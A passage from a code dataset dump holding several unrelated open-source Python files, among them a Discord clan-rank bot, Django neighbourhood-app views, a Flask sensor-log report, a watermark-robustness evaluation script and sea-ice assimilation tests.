\"\"\"\n\n price_wide = pd.pivot_table(price, values='price', index=['date'], columns=['stock_cd'])\n\n mdd_1m = cal_mdd2(price_wide, 1, mdd_latest_date)\n mdd_3m = cal_mdd2(price_wide, 3, mdd_latest_date)\n mdd_6m = cal_mdd2(price_wide, 6, mdd_latest_date)\n mdd_12m = cal_mdd2(price_wide, 12, mdd_latest_date)\n mdd_24m = cal_mdd2(price_wide, 24, mdd_latest_date)\n\n mdd_set = mdd_1m.merge(\n mdd_3m, how='left', on=['stock_cd', 'date']).merge(\n mdd_6m, how='left', on=['stock_cd', 'date']).merge(\n mdd_12m, how='left', on=['stock_cd', 'date']).merge(\n mdd_24m, how='left', on=['stock_cd', 'date'])\n\n mdd_set = mdd_set.sort_values(by=['stock_cd', 'date'])\n\n return mdd_set\n\n\ndef update_mdd_table():\n \"\"\" 서버db 업데이트(mdd table의 가장 최근 시점 이후의 mdd만을 기존 db에 append) \"\"\"\n\n price, mdd_latest_date = load_required_df()\n\n updated_mdd = return_mdd_set(price, mdd_latest_date)\n updated_mdd = updated_mdd.loc[updated_mdd.date > mdd_latest_date, :]\n\n return updated_mdd","repo_name":"HwangWonYoung/quant_project","sub_path":"update/mdd/mdd_updater.py","file_name":"mdd_updater.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"26076028381","text":"import zerobot_common\nfrom zerobot_common import gem_exceptions, gem_req_rank\nfrom member import valid_discord_id, valid_profile_link\n\n# what people type down -> what rankup they mean, in a format that works for\n# files and channel names.\nrank_parser = {\n\t\"leaders\" : \"leader\",\n\t\"staff_members\" : \"staff_member\",\n\t\"staff\" : \"staff_member\",\n\t\"masterclass_pvmers\" : \"masterclass_pvmer\",\n\t\"masterclass\" : \"masterclass_pvmer\",\n\t\"supreme_pvmers\" : \"supreme_pvmer\",\n\t\"supreme\" : \"supreme_pvmer\",\n\t\"pvm_specialist\" : \"pvm_specialist\",\n\t\"pvm_specialists\" : \"pvm_specialist\",\n\t\"pvm-specialist\" : \"pvm_specialist\",\n\t\"pvm-specialists\" : \"pvm_specialist\",\n\t\"pvm-spec\" : \"pvm_specialist\",\n\t\"pvm_spec\" : \"pvm_specialist\",\n\t\"specialist\" : \"pvm_specialist\",\n\t\"specialists\" : \"pvm_specialist\",\n\t\"spec\" : \"pvm_specialist\",\n \"captain\" : \"pvm_specialist\",\n \"elite_member\" : \"elite_member\",\n \"elite-member\" : \"elite_member\",\n \"elite_members\" : \"elite_member\",\n \"elite-members\" : \"elite_member\",\n \"elite\" : \"elite_member\",\n \"zer0_legend\" : \"zer0_legend\",\n \"zer0-legend\" : \"zer0_legend\",\n \"legend\" : \"zer0_legend\",\n \"zer0_hero\" : \"zer0_hero\",\n \"zer0-hero\" : \"zer0_hero\",\n \"hero\" : \"zer0_hero\",\n \"zer0_og\" : \"zer0_og\",\n \"zer0-og\" : \"zer0_og\",\n \"og\" : \"zer0_og\",\n \"pvm_expert\" : \"pvm_expert\",\n \"pvm-expert\" : \"pvm_expert\",\n \"pvm_experts\" : \"pvm_expert\",\n \"pvm-experts\" : \"pvm_expert\",\n \"expert-pvm\" : \"pvm_expert\",\n \"expert_pvm\" : \"pvm_expert\",\n \"experts_pvm\" : \"pvm_expert\",\n \"experts-pvm\" : \"pvm_expert\",\n \"experts\" : \"pvm_expert\",\n \"exp\" : \"pvm_expert\",\n \"expert\" : \"pvm_expert\",\n \"lieutenant\" : \"pvm_expert\",\n\t\"veteran_members\" : \"veteran_member\",\n\t\"veterans\" : \"veteran_member\",\n\t\"veteran\" : \"veteran_member\",\n\t\"sergeant\" : \"veteran_member\",\n\t\"advanced_members\" : \"advanced_member\",\n\t\"advanced\" : \"advanced_member\",\n\t\"corporal\" : \"advanced_member\",\n\t\"full member\" : \"member\",\n\t\"full\" : \"member\",\n\t\"member\" : \"member\",\n\t\"join\" : \"member\",\n\t\"entry\" : \"member\",\n\t\"novice\" : \"member\",\n\t\"recruit\" : \"member\",\n \"guest\" : \"Guest\",\n \"waiting\" : \"waiting_approval\",\n \"approval\" : \"waiting_approval\"\n}\n\n# clear rankup name format -> what actual discord ranks belong to them.\ndiscord_rank_parser = {\n\t\"leader\" : \"Leaders\",\n\t\"staff_member\" : \"Staff Member\",\n\t\"masterclass_pvmer\" : \"MasterClass PvMer\",\n\t\"supreme_pvmer\" : \"Supreme PvMer\",\n\t\"pvm_specialist\" : \"PvM Specialists\",\n \"elite_member\" : \"Elite Member\",\n \"legend\" : \"Zer0 Legend\",\n \"zer0_hero\" : \"Zer0 Hero\",\n \"zer0_og\" : \"Zer0 OG\",\n \"pvm_expert\" : \"PvM Expert\",\n\t\"veteran_member\" : \"Veteran Member\",\n\t\"advanced_member\" : \"Advanced Member\",\n\t\"member\" : \"Member\",\n \"guest\" : \"Guest\",\n \"waiting_approval\" : \"Waiting Approval\"\n}\n\n# discord ranks that can not be applied for, like admin or special ones\ndisallowed_rankups = {\n \"Leaders\",\n \"Clan Issues\",\n \"PvM Coordinator\",\n \"Elite Member\",\n \"Zer0 OG\",\n \"Zer0 Legend\",\n \"Zer0 Hero\",\n}\n\nmatch_disc_ingame = {\n \"Leaders\" : [\"Owner\",\"Deputy Owner\",\"Overseer\"],\n \"Clan Issues\" : [\"Coordinator\"],\n \"PvM Coordinator\" : [\"Coordinator\"],\n \"Retired Leader\" : [\"Coordinator\"],\n\t\"Staff Member\" : [\"Organiser\"],\n\t\"MasterClass PvMer\" : [\"Admin\"],\n\t\"Supreme PvMer\" : [\"General\"],\n\t\"PvM Specialists\" : [\"Captain\"],\n\t\"Elite Member\" : [\"Captain\"],\n\t\"Zer0 Legend\" : [\"Lieutenant\"],\n\t\"Zer0 OG\" : [\"Lieutenant\"],\n\t\"PvM Expert\" : [\"Lieutenant\"],\n\t\"Veteran Member\" : [\"Sergeant\"],\n\t\"Advanced Member\" : [\"Corporal\"],\n\t\"Member\" : [\"Recruit\"],\n \"Clan Friends/Allies\" : [],\n \"Guest\" : [],\n \"Waiting Approval\" : []\n}\n\n# rank matching if shivtr site is connected.\n# adding \"\" = not having a site account is allowed as match\nmatch_disc_site = {\n \"Leaders\" : [\"\",\"Leader\",\"Co-Leader\"],\n \"Clan Issues\" : [\"\",\"Clan Issues\"],\n \"PvM Coordinator\" : [\"\",\"Clan-Coordinator\"],\n\t\"Staff Member\" : [\"\",\"Staff Member\"],\n\t\"MasterClass PvMer\" : [\"\",\"MasterClass PvMer\"],\n\t\"Supreme PvMer\" : [\"\",\"Supreme PvMer\"],\n\t\"PvM Specialists\" : [\"\",\"PvM Specialists\"],\n\t\"Elite Member\" : [\"\",\"Elite Member\"],\n\t\"Zer0 Legend\" : [\"\",\"Veteran Member\"],\n\t\"Zer0 OG\" : [\"\",\"Veteran Member\"],\n\t\"PvM Expert\" : [\"\",\"PvM Expert\"],\n\t\"Veteran Member\" : [\"\",\"Veteran Member\"],\n\t\"Advanced Member\" : [\"\",\"Advanced Member\"],\n\t\"Member\" : [\"\",\"Recruit\"],\n \"Clan Friends/Allies\" : [\"\",\"Registered Guest\",\"Retired member\"],\n \"Guest\" : [\"\",\"Registered Guest\",\"Retired member\"],\n \"Waiting Approval\" : [\"\"]\n}\n\n# dpm tags, lowest at top (highest rank = highest index in dict)\nmage_dpm_tags = {\n 590922060193071118: \"850k Mage\",\n 590923162410024980: \"1000k Mage\",\n 590923449162006553: \"1150k Mage\",\n 590924385452556309: \"1300k Mage\",\n 976180300080119828: \"1450k Mage\",\n 976180827455103046: \"1600k Mage\",\n 976181411969134622: \"1750k Mage\",\n 976215930453504101: \"1900k Mage\"\n}\nmelee_dpm_tags = {\n 590922131366477824: \"850k Melee\",\n 590923236603199509: \"1000k Melee\",\n 590923501930545181: \"1150k Melee\",\n 590924439604953139: \"1300k Melee\",\n 976180296049381396: \"1450k Melee\",\n 976180824296800266: \"1600k Melee\",\n 997410847125147688: \"1750k Melee\",\n 997411137979170857: \"1900k Melee\"\n}\nrange_dpm_tags = {\n 590921829204623381: \"850k Range\",\n 590923065622528000: \"1000k Range\",\n 590923403377246208: \"1150k Range\",\n 590924088852217856: \"1300k Range\",\n 976180303053877309: \"1450k Range\",\n 976180830340792380: \"1600k Range\",\n 997411463167746318: \"1750k Range\",\n 997411302785941664: \"1900k Range\"\n}\n\nboss_tags = {\n 674321943247192075,\n 674321787886239779,\n 674322127125479429,\n 808332092823961641,\n 674321305495142452,\n 674321662669488128,\n 674321502082170881,\n 538377429891153920,\n 538377295799386122,\n 538377787803697162,\n 538377081097289730,\n 796009482613162014,\n 796009708275236904,\n 796009893249286195,\n 786653923174907935,\n 538377910533226536,\n 538377553753407488,\n 893774649035468810,\n 893774207337521182,\n 620706392352751627,\n 620706827855986698,\n 634848100900405248,\n 786653717029847060,\n 474659531847237662,\n 761563102697095168,\n 761563422457593876,\n 761562722520268810,\n 761563345370873877,\n 796009428561166376,\n 796009634867052564,\n 796009809367269416,\n 761564324777951272,\n 761564190120476682,\n 893774431120412673,\n 893774921015111690,\n 786653656438931486,\n 761563185026826270,\n 761562491892400138,\n 761563005778526218,\n 761562895669788692,\n 761563271677214730,\n 761563508289962024,\n 796009326095368202,\n 796009582744698940,\n 796009760926203944,\n 761564244901888000,\n 761564152468078632,\n 893774487294734336,\n 893774925976977430,\n}\n\ndef update_discord_info(_memberlist):\n \"\"\"\n Checks discord roles and dpm tags for each member in the memberlist and updates them to the highest rank.\n \"\"\"\n # loop through memberlist\n for memb in _memberlist :\n # skip if discord id invalid\n if not valid_discord_id(memb.discord_id): continue\n usr = zerobot_common.guild.get_member(memb.discord_id)\n # skip if usr not found, keep old rank & discord id, set name as left discord to indicate\n # \"Not in clan discord\" = exception for old people who never joined / people who cant join\n if (usr == None):\n memb.discord_name = \"Left clan discord\"\n continue\n\n # update discord name\n memb.discord_name = usr.name\n\n # update dpm tags\n memb.passed_gem = False\n highest_mage = -1\n highest_melee = -1\n highest_range = -1\n memb.misc[\"highest_mage\"] = \"\"\n memb.misc[\"highest_melee\"] = \"\"\n memb.misc[\"highest_range\"] = \"\"\n for r in usr.roles:\n if r.id in mage_dpm_tags:\n memb.passed_gem = True\n index = list(mage_dpm_tags.keys()).index(r.id)\n if index > highest_mage:\n memb.misc[\"highest_mage\"] = r.name\n highest_mage = index\n if r.id in melee_dpm_tags:\n memb.passed_gem = True\n index = list(melee_dpm_tags.keys()).index(r.id)\n if index > highest_melee:\n memb.misc[\"highest_melee\"] = r.name\n highest_melee = index\n if r.id in range_dpm_tags:\n memb.passed_gem = True\n index = list(range_dpm_tags.keys()).index(r.id)\n if index > highest_range:\n memb.misc[\"highest_range\"] = r.name\n highest_range = index\n\n # update highest discord rank\n highest_role = zerobot_common.highest_role(usr)\n if highest_role is not None:\n memb.discord_rank = highest_role.name\n # previous rank info kept if new rank unknown?\n\n # store all current discord role ids.\n discord_roles = []\n for r in usr.roles:\n discord_roles.append(r.id)\n memb.misc[\"discord_roles\"] = discord_roles\n\ndef TodosJoinDiscord(memberlist):\n response = list()\n for memb in memberlist:\n # no discord id, and never manually entered name\n if not valid_discord_id(memb.discord_id):\n response.append(f\"{memb.name}\\n\")\n response = [f\"**Need to join discord or need a discord id update on sheet:** {len(response)}\\n\"] + response\n return response\ndef rankInfo(member):\n msg = f\" {member.name_fixed_length()} - entry id {member.entry_id}: \"\n discord_rank = member.discord_rank\n if (member.discord_rank == \"\"):\n discord_rank = \"Unknown\"\n msg += f\"ingame: {member.rank}, discord: {discord_rank}\"\n if zerobot_common.site_enabled:\n site_rank = member.site_rank\n if (member.site_rank == \"\"):\n site_rank = \"Unknown\"\n msg += f\", site: {site_rank}\"\n msg += f\", passed gem: {member.passed_gem}\\n\"\n return msg\ndef TodosUpdateRanks(memberlist):\n _need_rank_update = list()\n for memb in memberlist:\n # find minimum rank for gem, can set as -1 for no gem req\n if gem_req_rank == None:\n gem_req_disc_rank = -1\n else:\n gem_req_disc_rank = list(match_disc_ingame.keys()).index(gem_req_rank)\n try:\n discord_rank = list(match_disc_ingame.keys()).index(memb.discord_rank)\n except ValueError:\n # cant find their rank in the list -> needs a rank.\n _need_rank_update.append(memb)\n continue\n # no gem, gem req for their rank, rank or name not in gem exceptions.\n if not memb.passed_gem and discord_rank <= gem_req_disc_rank:\n if not(memb.discord_rank in gem_exceptions or memb.name in gem_exceptions):\n _need_rank_update.append(memb)\n continue\n # site rank does not match discord rank\n if zerobot_common.site_enabled:\n if not memb.site_rank in match_disc_site[memb.discord_rank]:\n _need_rank_update.append(memb)\n continue\n # ingame rank does not match discord rank\n if not memb.rank in match_disc_ingame[memb.discord_rank]:\n _need_rank_update.append(memb)\n continue\n # build up response\n response = list()\n for memb in _need_rank_update:\n response.append(rankInfo(memb))\n response = [f\"Need a rank update: {len(response)}\\n\"] + response\n return response\ndef TodosInviteIngame(memberlist):\n response = list()\n for memb in memberlist:\n # no discord id, and never manually entered name\n if (memb.rank == \"needs invite\"):\n response.append(f\"{memb.name}\\n\")\n response = [f\"**Need to be invited ingame:** {len(response)}\\n\"] + response\n return response\n\ndef Todos(_memberlist, *args):\n \"\"\"\n Finds tasks by looking at inconsistencies in the memberlist.\n Assumes the memberlist is up to date with latest info.\n \"\"\"\n _no_discord = list()\n _no_site = list()\n _no_gem = list()\n for memb in _memberlist:\n # no valid site profile\n if not valid_profile_link(memb.profile_link):\n _no_site.append(memb)\n # no valid discord id, or no longer on discord\n if not valid_discord_id(memb.discord_id) or memb.discord_name == \"Left clan discord\":\n _no_discord.append(memb)\n # not passed gem, and listed to get rankup with gem = need gem\n if not memb.passed_gem:\n _no_gem.append(memb)\n response = list()\n if (len(args) != 1):\n response.append(\"**To do lists:**\\n\")\n response += TodosJoinDiscord(_memberlist)\n response += TodosInviteIngame(_memberlist)\n response += TodosUpdateRanks(_memberlist)\n message = f\"\\n- not on discord: {len(_no_discord)}\\n\"\n message += f\"- not on clan site: {len(_no_site)}\\n\"\n message += f\"- no gem : {len(_no_gem)}\\n\"\n message += f\"\\nYou can add one of these after `-zbot todos ` to get more details: `nodiscord`, `nosite`, `nogem`\"\n response.append(message)\n return response\n if (len(args) == 1):\n if (args[0] == \"nodiscord\"):\n response.append(\"\\n\\nThese are not on the clan discord:\\n\")\n for memb in _no_discord:\n response.append(f\"{memb.name}\\n\")\n return response\n if (args[0] == \"nosite\"):\n response.append(\"\\n\\nThese are not on the clan website:\\n\")\n for memb in _no_site:\n response.append(f\"{memb.name}\\n\")\n return response\n if (args[0] == \"nogem\"):\n response.append(\"\\n\\nThese still need to pass a gem:\\n\")\n for memb in _no_gem:\n response.append(f\"{memb.name}\\n\")\n return response\n response.append(\"\\n\\nNeeds to `-zbot todos ` plus one of : `nodiscord`, `nosite`, `nogem`\")\n return response","repo_name":"ErikMekkes/ZeroBot","sub_path":"rankchecks.py","file_name":"rankchecks.py","file_ext":"py","file_size_in_byte":13844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"15893689746","text":"names=[]\r\nages=[]\r\nemails=[]\r\nfor counter in range(0,3):\r\n name=input(\"Enter name\")\r\n age=input(\"Enter age\")\r\n email=input(\"Enter email\")\r\n\r\n names.insert(counter,name)\r\n ages.insert(counter, age)\r\n emails.insert(counter, email)\r\n\r\nprint(names)\r\nprint(ages)\r\nprint(emails)","repo_name":"Debolina136208/python","sub_path":"Day1Assignments/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"43993295241","text":"#!/usr/bin/python3\n# -*- coding: utf8 -*-\nimport os\nimport time\nimport pandas as pd\nimport numpy as np\n\n\ndef procesa_datos(archivo_log):\n\n df = pd.read_csv(archivo_log, sep= \";\", header=None)\n df.columns= ['Fecha','Hora','Temperatura','Humedad','Ventilador','Extractor','Luz']\n\n #guardamos variable fecha\n del(df['Fecha'])\n\n #cambiamos tipo de variables\n df = df.astype({\"Ventilador\":'object', \"Extractor\":'object', \"Luz\":'object'})\n\n\n #cambiando 1 y 0 por On y Off\n df.loc[df['Ventilador'] == 1, 'Ventilador'] = 'On'\n df.loc[df['Ventilador'] == 0, 'Ventilador'] = 'Off'\n df.loc[df['Extractor'] == 1, 'Extractor'] = 'On'\n df.loc[df['Extractor'] == 0, 'Extractor'] = 'Off'\n df.loc[df['Luz'] == 1, 'Luz'] = 'On'\n df.loc[df['Luz'] == 0, 'Luz'] = 'Off'\n\n temp_min = np.amin(df['Temperatura'])\n temp_max = np.amax(df['Temperatura'])\n temp_media = int(round(np.mean(df['Temperatura']), 1))\n\n hum_min = int(np.amin(df['Humedad']))\n hum_max = int(np.amax(df['Humedad']))\n hum_media = int(round(np.mean(df['Humedad']), 1))\n\n if len(df) > 2:\n prop_vent = int(round( (len(df.loc[ df['Ventilador'] == \"On\"]) / len(df) * 100) , 1))\n prop_ext = int(round( (len(df.loc[ df['Extractor'] == \"On\"]) / len(df) * 100) , 1))\n else:\n prop_vent = \"-\"\n prop_ext = \"-\"\n\n return temp_min, temp_max, temp_media, hum_min, hum_max, hum_media, prop_vent, prop_ext\n\n\n\ndef reporte():\n archivo_log = \"/home/pi/freshgrowpi/log/log_clima_\" + time.strftime(\"%d-%m-%y\") + \".csv\"\n\n if os.path.isfile(archivo_log) == False:\n #print(\"Error abriendo archivo LOG\")\n temp_max = \"0\"\n temp_min = \"0\"\n temp_media = \"0\"\n hum_max = \"0\"\n hum_min = \"0\"\n hum_media = \"0\"\n prop_vent = \"0\"\n prop_ext = \"0\"\n\n return temp_min, temp_max, temp_media, hum_min, hum_max, hum_media, prop_vent, prop_ext\n\n else:\n variables = procesa_datos(archivo_log)\n return variables\n#reporte()\n","repo_name":"J0seca/freshgrowpi","sub_path":"flask/bin/flask_reporte.py","file_name":"flask_reporte.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37101784243","text":"\nfrom multiprocessing import context\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom mtaani.models import *\nfrom .forms import *\n\n# Create your views here.\n\ndef homepage(request):\n title = \"homepage\"\n all_hoods = Neighbourhood.objects.all()\n context = {\n \"title\": title,\n \"all_hoods\": all_hoods,\n }\n return render(request, 'all-pages/homepage.html',context)\n\n@login_required\ndef profile(request):\n context = {\n \"profile\": profile,\n }\n if request.user == profile:\n return redirect('profile', context, username=request.user.username)\n return render(request, 'all-pages/profile.html')\n\n\n@login_required\ndef edit_profile(request,user_id):\n user=get_object_or_404(User,id=user_id)\n form = UpdateProfileForm()\n if request.method == 'POST':\n form = UpdateProfileForm(request.POST,request.FILES)\n if form.is_valid():\n post_profile=form.save(commit=False)\n post_profile.profile_user=user\n form.save()\n return redirect('profile')\n else:\n form = UpdateProfileForm()\n return render(request, 'all-pages/edit_profile.html', {'form': form})\n\n@login_required\ndef create_new_hood(request):\n #current_user=request.user\n form = NeighbourhoodForm()\n if request.method == 'POST':\n form = NeighbourhoodForm(request.POST, request.FILES)\n if form.is_valid():\n hood = form.save(commit=False)\n hood.neighbourhood_admin = request.user\n hood.save()\n return redirect('hood')\n else:\n form = NeighbourhoodForm()\n return render(request, 'all-pages/new_hood.html', {'form': form})\n\ndef hoods(request):\n all_hoods = Neighbourhood.objects.all()\n all_hoods = all_hoods[::-1]\n context = {\n 'all_hoods': all_hoods,\n }\n return render(request, 'all-pages/all_hoods.html', context)\n\n@login_required\ndef add_business(request):\n form = BusinessForm()\n if request.method == 'POST':\n form = BusinessForm(request.POST, request.FILES)\n if form.is_valid():\n business = form.save(commit=False)\n business.business_user = request.user\n business.save()\n return redirect('business')\n else:\n form = BusinessForm()\n return redirect(request,'all-pages/business.html', {\"form\": form}) \n\n@login_required\ndef join_hood(request, id):\n neighbourhood = get_object_or_404(Neighbourhood, id=id)\n request.user.profile.profile_neighbourhood = neighbourhood\n request.user.profile.save()\n return redirect('hood')\n\n@login_required\ndef leave_hood(request, id):\n neighbourhood = get_object_or_404(Neighbourhood, id=id)\n request.user.profile.profile_neighbourhood = neighbourhood\n request.user.profile.save()\n return redirect('hood')\n\n@login_required\ndef hood_members(request, post_neighbourhood_id):\n hood = Neighbourhood.objects.get(id=post_neighbourhood_id)\n members = Profile.objects.filter(profile_neighbourhood=hood)\n return render(request, 'all-pages/members.html', {'members': members})\n\ndef single_hood(request, post_neighbourhood_id):\n hood = Neighbourhood.objects.get(id=post_neighbourhood_id)\n business = Business.objects.filter(business_neighbourhood=hood)\n posts = Post.objects.filter(post_neighbourhood = hood)\n if request.method == 'POST':\n form = BusinessForm(request.POST)\n if form.is_valid():\n bsn_form = form.save(commit=False)\n bsn_form.business_neighbourhood = hood\n bsn_form.business_user = request.user.profile\n bsn_form.save()\n return redirect('single-hood', hood.id)\n else:\n form = BusinessForm()\n context = {\n 'hood': hood,\n 'business': business,\n 'form': form,\n 'posts': posts,\n }\n return render(request, 'all-pages/single-hood.html', context)\n\ndef create_post(request, post_neighbourhood_id):\n hood = Neighbourhood.objects.get(id=post_neighbourhood_id)\n if request.method == 'POST':\n form = NewPostForm(request.POST)\n if form.is_valid():\n new_post = form.save(commit=False)\n new_post.post_neighbourhood = hood\n new_post.post_user = request.user.profile\n new_post.save()\n return redirect('single-hood', hood.id)\n else:\n form = NewPostForm()\n return render(request, 'all-pages/post.html', {'form': form})\n\ndef search_business(request):\n if request.method == 'GET':\n business_name = request.GET.get('post_title')\n results = Business.objects.filter(business_name__icontains=business_name).all()\n display_message = f'business_name'\n \n context = {\n 'results': results,\n 'display_message': display_message\n }\n return render (request, 'all-pages/search-results.html', context)\n else:\n display_message = \" You have not searched for any business\"\n return render (request,'all-pages/search-results.html')\n\ndef search_all_business(request):\n if request.method == 'GET':\n business_name = request.GET.get('title')\n results = Business.objects.filter(business_name__icontains=business_name).all()\n display_message = f'business_name'\n \n context = {\n 'results': results,\n 'display_message': display_message\n }\n return render (request, 'all-pages/search-results.html', context)\n else:\n display_message = \" You have not searched for any business\"\n return render (request,'all-pages/search-results.html')","repo_name":"KellyKiiru/django-ip4","sub_path":"mtaani/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34322131759","text":"\"\"\" This script trains null models given a configuration file (see configs) \"\"\"\n\nimport argparse\n\nimport mlconfig\nimport torch\n\nimport os\n\nfrom tqdm import tqdm\n\nfrom wrt.utils import reserve_gpu\n\nimport numpy as np\n\n# Registers all hooks. Do not remove.\nfrom wrt.classifiers import PyTorchClassifier\nfrom wrt.defenses import Watermark\nfrom wrt.training.utils import compute_accuracy\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-w', '--wm_config', type=str, default='configs/imagenet/wm_configs/jia.yaml',\n help=\"Path to config file for the watermarking scheme.\")\n parser.add_argument('--no-cuda', action='store_true')\n parser.add_argument('--best', action='store_true')\n parser.add_argument(\"--gpu\", type=str, default=None, help=\"Which GPU to use. Defaults to GPU with least memory.\")\n parser.add_argument(\"--pretrained_dir\", default=\"outputs/imagenet/wm/jia/00013_jia\")\n return parser.parse_args()\n\n\ndef __load_model(model, optimizer, image_size, num_classes, pretrained_dir: str = None,\n best=False, load_optimizer=False):\n \"\"\" Loads a source model from a directory and wraps it into a pytorch classifier.\n \"\"\"\n criterion = torch.nn.CrossEntropyLoss()\n\n if pretrained_dir:\n print(f\"Loading source model from '{pretrained_dir}'.\")\n for file in os.listdir(pretrained_dir):\n if best:\n if file.endswith(\".pth\"):\n model.load_state_dict(torch.load(os.path.join(pretrained_dir, file))[\"model\"])\n print(f\"Loaded model '{file}'\")\n elif file.endswith(\".model\"):\n model.load_state_dict(torch.load(os.path.join(pretrained_dir, file)))\n print(f\"Loaded model '{file}'\")\n\n if load_optimizer and file.endswith(\".optimizer\"):\n optimizer.load_state_dict(torch.load(os.path.join(pretrained_dir, file)))\n print(f\"Loaded optimizer '{file}'.\")\n\n model = PyTorchClassifier(\n model=model,\n clip_values=(0, 1),\n loss=criterion,\n optimizer=optimizer,\n input_shape=(3, image_size, image_size),\n nb_classes=num_classes\n )\n return model\n\n\ndef evaluate_test_accuracy(predictor, val_data, learning_phase=False, batch_size=32, verbose=True, limit_batches=np.inf):\n accs = []\n val_loop = tqdm(enumerate(val_data), disable=not verbose, total=min(limit_batches, len(val_data)))\n for i, (x_batch, y_batch) in val_loop:\n if i >= limit_batches:\n break\n if len(accs) > 0:\n val_loop.set_description('Validation ({:.4f})'.format(sum(accs) / len(accs)))\n x_batch = x_batch.detach().clone().cpu().numpy()\n y_batch = y_batch.detach().clone().cpu().numpy()\n if len(y_batch.shape) > 1:\n y_batch = np.argmax(y_batch, axis=1)\n with torch.no_grad():\n accs.append(compute_accuracy(predictor.predict(x_batch, batch_size=batch_size, learning_phase=learning_phase), y_batch)[0])\n return sum(accs) / len(accs)\n\n\ndef compute_metrics(defense_instance, x_wm, y_wm, test_loader):\n source_model = defense_instance.get_classifier()\n\n test_acc = evaluate_test_accuracy(source_model, test_loader, limit_batches=50, learning_phase=False)\n wm_acc = compute_accuracy(source_model.predict(x_wm, learning_phase=True), y_wm)[0]\n return {\n \"wm_acc\": wm_acc,\n \"test_acc\": test_acc\n }\n\n\ndef main():\n # Takes more time at startup, but optimizes runtime.\n torch.backends.cudnn.benchmark = True\n\n args = parse_args()\n reserve_gpu(args.gpu)\n\n defense_config = mlconfig.load(args.wm_config)\n print(defense_config)\n\n source_model = defense_config.source_model()\n optimizer = defense_config.optimizer(source_model.parameters())\n # source_model.override_learning_phase = True\n\n source_model: PyTorchClassifier = __load_model(source_model,\n optimizer,\n best=True,\n load_optimizer=True,\n image_size=defense_config.source_model.image_size,\n num_classes=defense_config.source_model.num_classes,\n pretrained_dir=args.pretrained_dir)\n\n valid_loader = defense_config.predict_dataset(train=False)\n\n # Create the defense instance\n defense: Watermark = defense_config.wm_scheme(source_model)\n\n keys = np.load(os.path.join(args.pretrained_dir, \"secret_key.npz\"))\n x_wm, y_wm = keys[\"x_wm\"], keys[\"y_wm\"]\n\n # Outputs relevant for saving.\n metrics: dict = compute_metrics(defense, x_wm, y_wm, valid_loader)\n\n print(metrics)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dnn-security/Watermark-Robustness-Toolbox","sub_path":"test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"83"} +{"seq_id":"5328222389","text":"import numpy as np\n\nimport pytest\n\nfrom ice_simplex_assimilate.deltize import RawSample, HeightBounds, \\\n process_sample, post_process_sample, process_ensemble, post_process_ensemble\n\n@pytest.fixture\ndef h_bnd():\n return HeightBounds.from_interval_widths(np.array([1, 2, 3]))\n\ndef test_create_height_bounds_from_interval_widths(h_bnd):\n HeightBounds.from_interval_widths(np.array([1, 2, 3]))\n\ndef test_create_height_bounds():\n HeightBounds(np.array([0, 1, 3, 6]))\n\ndef test_create_raw_sample(h_bnd):\n area = np.array([0.1, 0.2, 0.3])\n volume = np.array([0.05, 0.4, 1.0])\n snow = None\n RawSample(area, volume, snow)\n\ndef test_process_sample(h_bnd):\n area = np.array([0.1, 0.2, 0.3])\n volume = np.array([0.05, 0.4, 1.0])\n raw_sample = RawSample(area, volume)\n sample = process_sample(raw_sample, h_bnd)\n assert np.isclose(1, sample.sum(), atol=1e-20)\n\ndef post_process_inverts_process(h_bnd):\n area = np.array([0.1, 0.2, 0.3])\n volume = np.array([0.05, 0.4, 1.0])\n raw_sample = RawSample(area, volume)\n sample = process_sample(raw_sample, h_bnd)\n post_sample = post_process_sample(sample, h_bnd)\n assert np.allclose(raw_sample.area, post_sample.area)\n assert np.allclose(raw_sample.volume, post_sample.volume)\n\n","repo_name":"oscarlaird/ice_simplex_assimilate","sub_path":"tests/test_deltize.py","file_name":"test_deltize.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9182795942","text":"import FWCore.ParameterSet.Config as cms\nprocess = cms.Process(\"ANASKIM\")\n\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.StandardSequences.GeometryDB_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_38T_cff')\nprocess.load('Configuration.StandardSequences.Reconstruction_cff')\nprocess.load('Configuration.StandardSequences.EndOfProcess_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\nprocess.load('HeavyIonsAnalysis.Configuration.collisionEventSelection_cff')\nprocess.load('RecoHI.HiCentralityAlgos.HiCentrality_cfi')\nprocess.load('Configuration.EventContent.EventContentHeavyIons_cff')\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n'/store/hidata/HIRun2013A/PAHighPt/RECO/PromptReco-v1/000/210/634/FA4E6B7E-7366-E211-8DD0-0019B9F581C9.root'\n)\n)\n# =============== Other Statements =====================\nprocess.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(4000))\nprocess.options = cms.untracked.PSet(wantSummary = cms.untracked.bool(True))\nprocess.GlobalTag.globaltag = 'GR_P_V41::All'\n\n# =============== Import Sequences =====================\nprocess.load(\"davidlw.HighPtFlow2011.ppExtraReco_cff\")\nprocess.load(\"davidlw.HighPtFlow2011.PAHighMultiplicityPileUpFilter_cff\")\n\n#Trigger 